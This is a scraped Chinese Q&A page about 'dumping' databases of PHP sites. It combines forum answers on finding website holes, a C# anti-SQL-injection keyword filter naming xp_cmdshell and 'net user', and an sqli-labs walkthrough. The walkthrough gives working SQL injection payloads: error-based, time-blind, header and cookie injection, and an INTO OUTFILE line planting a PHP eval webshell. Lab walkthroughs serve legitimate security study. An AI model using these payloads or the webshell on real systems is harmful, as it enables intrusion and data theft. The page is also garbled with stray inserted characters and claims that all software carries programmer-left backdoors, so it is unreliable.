導航:首頁 > 編程語言 > php暴庫

php暴庫

發布時間:2023-05-31 22:38:09

Ⅰ 如何發現網站漏洞

問題一:黑客怎麼尋找網站漏洞,麻煩說一下! 拿站這技術活得靠點經驗,我簡單說下吧(我是菜鳥)。之前,很多網站一恭存在注入漏洞,就像一樓那樣說的,很多菜菜都是用啊D,明小子等軟體(本人絕無看不起軟體作者之意,打心底佩服前輩們),但是現在隨著國家發展強大,人民的生活水平提高,很多管理員動不動就裝個防注系統(繞過防注這里我不說),以前操起工具就日下一大堆站的日子一去不復返了。有些管理員粗心,導致出現上傳漏洞,雖然過濾很嚴,但是這樣的漏洞一般比較致命,或者人家防火牆很厲害,馬兒進一匹死一匹,這種漏洞一般是通過掃描出來的。也有一些管理員沒有改密碼,通過弱口令直接進去後台,還有一些後台頁面直接爆出密碼(很久了),還有就是爆庫,資料庫被爆出來~很多很多,說不完~望樓主採納。

問題二:黑客是如何發現系統漏洞的,系統為什麼會有漏洞? 不要為難微軟,畢竟微軟寫WINDOWS的傢伙們也都是人,雖然不是中國人。
只要是人做出來的東西,就沒有完美的,所以有問題也不奇怪。
這就好像一個打字員打了一篇稿子,打字員本身發現錯字的可能性很小,倒是別人一眼就可以看到打字員打錯的字。
雖然不知道這是為什麼,但真的是這樣。(以前我打字的時候就發現不到自己的錯字)
至於你的問題,微軟當初在編寫系統的時候為什麼不知道有漏洞?
回答:很多所謂的漏洞都不算是漏洞,都是正常的數據值,所以不容易被發現。
舉個例子,在檢測一些ASP網站的時候,會用到1=1 OR 1=2 之類的語句,
這本身是ASP的一種正常的程序語句,但是到了黑客手中,就成了檢測ASP網站的重要檢查項目,
黑客會根據檢測網站返回的數據值,而得到大量的信息。
有的黑客可以自己發現漏洞,他們是靠什麼技術發現的?
回答:說實話,這個問題我個人覺得問題很好。
黑客一詞,在以前的時候,是用來形容懂得計算機編程,擁供很好的計算機技術並且熱心於鑽研計算機技術的人
對於這種人,發現一些漏洞也是很正常的,就好像WIN2000的輸入法漏洞,就是中國人發現的。
其實只要你用某種系統習慣了,也會發現很多漏洞。比如XP,現在盜版的XP漏洞很多,只要你細心點,
你就會發讓野現很多的XP漏洞。

問題三:如何看一個網站有沒有漏洞、有什麼漏洞? 沒有一定足夠的程序能力沒有一定的網路安全經驗你是無法膽接判斷的,
對於這些初級菜鳥,只能藉助檢測工具來初略判斷。

問題四:黑客是怎麼樣去攻擊網站的,漏洞是怎坦褲喊么發現的? 網上所謂黑客入侵某某網站,都是根據目前公開的漏洞或者根據別人發掘的漏洞進行入侵的,入侵了後台就把木馬後門上傳伺服器內,實現控制目的,黑客攻擊網站主要是發送大量數據包,讓網站不能正常訪問等,本人收徒,學會再收費!

問題五:如何掃描網站的漏洞? 需要確定他使用的伺服器版本,還需要了解他的安全措施。他開了定0埠,至少可以D。O。S。PS:小心觸犯法律!

問題六:怎樣才純孫能找到網站漏洞 怎麼說那 是沒有檢測出來漏洞 才導致的
網站作了很好的硬體防火牆
沒辦法拉
這可是不道德的 注意

問題七:入侵網站的漏洞是怎麼生成的? 為什麼會有漏洞呢、謝謝了,大神幫忙啊 你好。樓主,關於你的這個問題很高興我來替你回答 所有網站和軟體的一般剛剛開始的時候是沒有多大問題的漏洞的,一般程序員在設定軟體的時候都是把軟體和網站分成模塊來做的,分為模塊1 或者模塊ABCD 這樣來的,每個軟體和網站都有後門的,因為這樣方便程序員測試網站,和所有的黑客一樣,入侵網站都是先找後門,利用後門程序向你的伺服器發送大量郵件,這就是垃圾信息郵件攻擊法,讓你的伺服器被信息撐爆,卡死,甚至癱瘓,第2種就是特洛伊木馬,向你的伺服器發送郵件,並帶上木馬程序,只要你運行了郵件中的附帶件,那麼,木馬就會潛入你的伺服器程序,在你不知不覺中得到他想要的信息,第3種就是直接發送網路炸彈到你的 伺服器使你的伺服器癱瘓死機,這種方法 很不人道,所以一半人不會用這種!其實漏洞就是所謂的後門,所有軟體和網站的後門都是程序員留著的。這樣也並不是說他們有什麼不良企圖,而是方便他們日後對軟體或者網站進行測試,修改,所以一般的程序員都會把這後門留著,後門如果被有不良企圖的人知道了,那麼就成了所謂的漏洞了。 如果樓主對我的回答還滿意的話,可以用五星來采為滿意答案

問題八:網站怎樣樣檢查漏洞 您好,現在一般是使用站長工具,我現在用了網路站長工具,如果網站有問題,系統會提示的,而且可以使用漏洞檢查軟體或在線工具直接可以檢測,還有就是如果是大型網站可以考慮做加密,加強網站的安全性能。工具您可以網路看看。

問題九:網路怎麼學習找漏洞。 這是我在網上看到的,希望對樓住有所幫助一 如何尋找漏洞
這個是大家最關心的。大家尋找漏洞只能尋找能讀到源代碼碼的,沒有源代碼但有注入漏洞的系統只能猜,具有特殊性。網上很多主機用的是成品,它的系統源代碼可以從網上下到。至於如何判斷主機用的是哪個系統,就需要大家有一定的積累了。這也沒法用語言描述,我舉個簡單的例子。
以動網6為例,看到某個論壇界面酷似動網,9成是動網論壇,再看看下面的版本就知道是動網6了。這個時候就可以去Chinaz下個動網6來讀一下,不會ASP的就沒辦法了。當然漏洞早就公布,我只是告訴大家如何判斷主機用哪個WEB系統。
漏洞是如何被發現的呢?其實也沒什麼訣竅,主要是扎實的基礎知識,要是連HTTP協議不懂,不會抓包,也別找漏洞了,找到也不會用,這樣最好先補基礎知識。有了基礎知識,剩下的就是毅力和耐心。論能力,現在好多系統漏洞,張三找的到,李四也找的到。
主要是看誰先找,誰下的工夫深。有的漏洞讀一遍源碼是找不到的。
找漏洞的過程也是熟悉這個WEB系統的過程,首先要了解它的資料庫結構,這是最基本的。接下來就得一個文件一個文件的讀。先讀不需要許可權的。
有的頁面開頭就來個SESSION判斷,就算下面有漏洞都沒用。
找漏洞的過程其實就是一個文件一個文件讀的過程。下面以一個頁面為例。首先把握系統流程。所謂系統的流程就是系統到底如何執行。一般系統為 開頭――中間――結尾 模式。開頭一般是輸出HTML中之間內容,對我們找漏洞沒有影響。
一般文件開頭都會包含很多頭文件,大家看了感到頭暈,其實頭文件都沒什麼用。主要是資料庫連接文件,全局配置文件,和函數庫。我們大可不理會這些東西,再找漏洞時用到了回頭再看也不遲。
但是函數庫裡面關於輸入串過濾的函數要重點看一下。
結尾是輸出系統版權信息,有的用到SQL查詢,不過這里用處也不大,我們可以很粗略的看一下。
中間部分是我們重點關注的地方。其次重點關注輸入變數。因為這些變數是我們控制的,沒有外來輸入變數也不用談注入了。
大家要有這樣一種概念,不管是GET,POST,還是COOKIE方法,只有是從用戶提交的變數都可以由我們指定,我們想讓它是多少就是多少。
至於系統取得變數後做了什麼過濾是另外一回事。
在輸入變數中要重點關注能參與SQL執行的變數,有的變數比如action或者page都是控制流程的,根本就沒用,就算改了值也沒什麼意思。再者就要深刻了解資料庫了,沒有對資料庫全面的把握,很可能錯失很多注入點,這也是高手和菜鳥最大的差別所在。
我們常見的資料庫有Access、Mysql和SQLServer,至少要對他們有很深的了解才能找出漏洞。二 分三個方面並舉實例講解注入點的尋找及利用
1 注入點很容易發現,利用也很簡單
這種漏洞相信已經很少了,除非程序作者根本就不關心程序的安全才會有此漏洞。以前經典的 ' or '1=1就屬於此類
典型的類似(模型,以下類同)
select * from tablename where user='request(user)',
select * from tablename where id=request(id)
有的程序對這些變數做了過濾,但不全,也可以歸結為這一類。
相信這樣的漏洞大家都能發現而且也很容易利用,更不用說防範了。這種漏洞容易找,也很少。我給大家截了幾個有漏洞的......>>

問題十:如何發現網站的漏洞啊?我是好人 你這個問題問題有點沒人敢答
這不是一個問題而是一萬個為什麼...
就像 我問你:如何做一桌子好吃的菜?
你說呢?
最真實的回答就是 你要去學,學什麼呢?就像別說一桌子菜
就算一道菜.
你要從選料 ,配料,加工,到炒制,甚至大廚還要學色彩搭配以及雕刻藝術
再深入的甚至要學比如豆子的生長過程,營養成分,以及地區差異
才能選出自己想要的好豆子...
那如何發現網站漏洞??????
那你就得從程序入手,為什麼會存在漏洞,存在漏洞的基礎條件
asp,php,net,c++.....等等程序代碼與伺服器系統的關系
myssql,sql與系統的關系
等等 各種基礎要素理解透徹之後
才可以有利於你發現漏洞
再然後才是根據這些缺點 弊端 去彌補漏洞 做到所謂的安全貢獻
另外 你也說你是個好人,是一個互聯網相關的好人
說明你對互聯網有一定的了解
我認為你不是在指望這里一問一答的...就能學會一門多年磨練才能有手藝吧???
更何況是技術含量的
先祝你成功吧
您的採納 是咱互助的動力源泉,理解萬歲

Ⅱ php網站在檢測時總是提示網站存在sql注入漏洞

1,用正則表達式過濾一些SQL注入關鍵字。
2,盡量使用參數形式,少用拼湊型SQL語句
3,條件可以的話,請使用存儲過程操作資料庫.
4,轉換參數類型.如是參數是數字型,則轉換成數字型的才操作
public class AntiSqlInAttack
{
public System.Web.HttpRequest request;

public AntiSqlInAttack(System.Web.HttpRequest request)
{
this.request = request;
}

public bool CheckBadQuery()
{
//整串字元對比方法
//string badword = ";|'|*|%| and |20%and20%| master |20%master20%|exec|insert|select|delete|count|chr|mid|truncate|char|declare|update";
//string query = request.ServerVariables["Query_String"].ToString();
//string[] badwordArry = badword.Split(new char[] { '|' });
//for (int i = 0; i < badwordArry.Length; i++)
//{
// string tempWord = badwordArry[i].Trim();
// if (query.IndexOf(tempWord) >= 1)
// return true;
//}
//return false;
if (request.QueryString.Count != 0)
{
for (int i = 0; i < request.QueryString.Count; i++)
{
if (CheckBadWord(request.QueryString[i].ToString()))
return true;
}
}
return false;
}

public bool CheckBadForm()
{
if (request.Form.Count > 0)
{
for (int i = 0; i < request.Form.Count; i++)
{
if (CheckBadWord(request.Form[i]))
return true;
}
}
return false;
}

public bool CheckBadWord(string str)
{
string pattern = @"select|insert|delete|from|count\(|drop table|update|truncate|asc\(|mid\(|char\(|xp_cmdshell|exec master|netlocalgroup administrators|:|net user|""|or|and";
if (Regex.IsMatch(str, pattern, RegexOptions.IgnoreCase) || Regex.IsMatch(str, @"[-|;|,|\/|\(|\)|\[|\]|\}|\{|%|@|\*|!|\']"))
return true;
return false;
}

/**//// <summary>
/// 反SQL注入
/// </summary>
public void AntiSqlInjectionAttack()
{
if (CheckBadQuery() || CheckBadForm())
{
string msg = string.Empty;
msg += "<span style='font-size:12px;'>非法操作!系統做了如下記錄!<br>";
msg += "操作IP:" +Utils.GetRealIP()+ "<br>";
msg += "操作時間:" + DateTime.Now + "<br>";
msg += "頁面:" + request.ServerVariables["URL"].ToLower() + "<br>";
msg += "<a href=\"#\" onclick=\"history.back()\">返回上一頁</a></span>";
MessageBox.ResponseWrite(msg, true);
}
}

}

Ⅲ sqli-labs(lesson1-lesson22)

插入單引號報錯

id被單引號包裹,確認欄位數

欄位為3,使用union select 1,2,3聯合查詢語句查看頁面是否有顯示位

有兩個顯示位,接下來開始爆庫名

爆表

爆列

爆值

插入單引號

由報錯判斷為數字型注入,注入方法同上,把單引號去掉就好

插入單引號報錯,輸入?id=1')--+發現可以正常顯示,判定為字元型注入

注入方法同上,在單引號後面加個括弧即可

插入單引號沒反應,換用雙引號後報錯,注入方法同上

看到這個報錯有可能是布爾型盲注,時間盲注,報錯注入
注入

考慮使用報錯注入

and (select 1 from (select count( ),concat((payload),floor (rand(0) 2))x from information_schema.tables group by x)a)
其中payload為你要插入的SQL語句
需要注意的是該語句將 輸出字元長度限制為64個字元

and updatexml(1,payload,1)
同樣該語句對輸出的字元長度也做了限制,其最長輸出32位
並且該語句對payload的反悔類型也做了限制,只有在payload返回的不是xml格式才會生效

and extractvalue(1, payload)
輸出字元有長度限制,最長32位。

使用floor報錯語句注入

輸出信息超過一行,只能用limit 0,1一個個輸出鄭拍了

庫名出來了,接下來方法就和之前一樣了

同樣的原理,把?id=1'的單引號換成雙引號就行

輸入?id=1

輸入?id=1 and 1=2回顯正常,不是數值型注入
嘗試加入單引號發現報錯,換成雙引號也是一樣,加上)依然報錯
輸入id=5')) --+

使用語句

寫入成功
上傳木馬,使用cknife鏈接
?id=-1')) union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "D:.php" --+

輸入?id=2' --+回顯正攜慶常

字元型注入,方喊隱羨法同上

輸入?id=1' and sleep(5) --+存在延遲,判斷為延遲型注入

同上,單引號換雙引號

登陸界面,使用萬能密碼

登陸成功,開爆
爆庫:

爆表:

爆欄位:

之後方法同上

頁面無返回信息,只能進行盲注
猜長度
admin') or length(database())>要猜的長度 and sleep(5)#
猜庫名:
admin') or left(version(),1)>'要猜的庫名' and sleep(5)#
猜表名:
admin') or ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>要猜的表名ASCII and sleep(5)#

之後方法同上

之後方法同上

和上面一樣,無返回信息,但是可以使用延時注入判斷注入點

其餘同上

做到自閉,查看源碼

莫得用戶名和密碼注入了

查看源碼

存在利用構造User Agent進行注入的可能,上brupsuit抓包改User Agent

得到mysql版本

同理,可得表名等信息
表名

Refer注入

查看源碼

存在cookie注入

其他同理

和上題一樣,屬於cookie注入,先看源碼

和上題基本一樣,之不過給用戶名(uname)進行了base64加密,對注入語句進行加密即可

報錯注入

與上題基本一樣,'改成」即可

Ⅳ php 訂單購買如果同時開兩個頁面怎樣才能不讓兩個頁面購買不幹擾存入到數據表

想不幹擾的話只能是訂單生成的時候就寫入庫里,並且url或咐核內置變數申明這個頁面的訂單uid。
理論上是可以實現的,不過問題在於垃圾訂單的處理,以及這樣做並不能改善頁面體驗效果。
頻繁的查庫有加深伺服器繁忙的衡洞掘誘因,如果被惡意爆庫那會影響正常用戶。
如果用本地cookie的話不排顫拆除被篡改的可能。
每種方法都有優點和缺點看選擇了。

閱讀全文

與php暴庫相關的資料

熱點內容
一捏就變形的解壓玩具怎麼折 瀏覽:196
易融貸app借錢怎麼 瀏覽:939
單片機側重點 瀏覽:867
江蘇惠普伺服器虛擬化設計雲主機 瀏覽:647
在歐拉app好貓充電樁怎麼申請 瀏覽:449
反編譯代碼教程 瀏覽:798
linuxio阻塞 瀏覽:973
8腳單片機pic 瀏覽:821
如何看彩色塗鴉遮住的字安卓 瀏覽:688
擺渡機器人編程 瀏覽:654
軟程序員著裝 瀏覽:139
寶雞雲存儲伺服器 瀏覽:668
推薦超解壓游戲無廣告 瀏覽:634
大華伺服器怎麼添加門禁 瀏覽:784
戰地伺服器60hz什麼意思 瀏覽:760
成高級程序員學什麼 瀏覽:501
阿里雲接入備案後退掉伺服器 瀏覽:928
ne40e命令 瀏覽:85
安卓輸入法使用什麼編碼 瀏覽:184
手機如何開淘寶店步驟安卓手機 瀏覽:593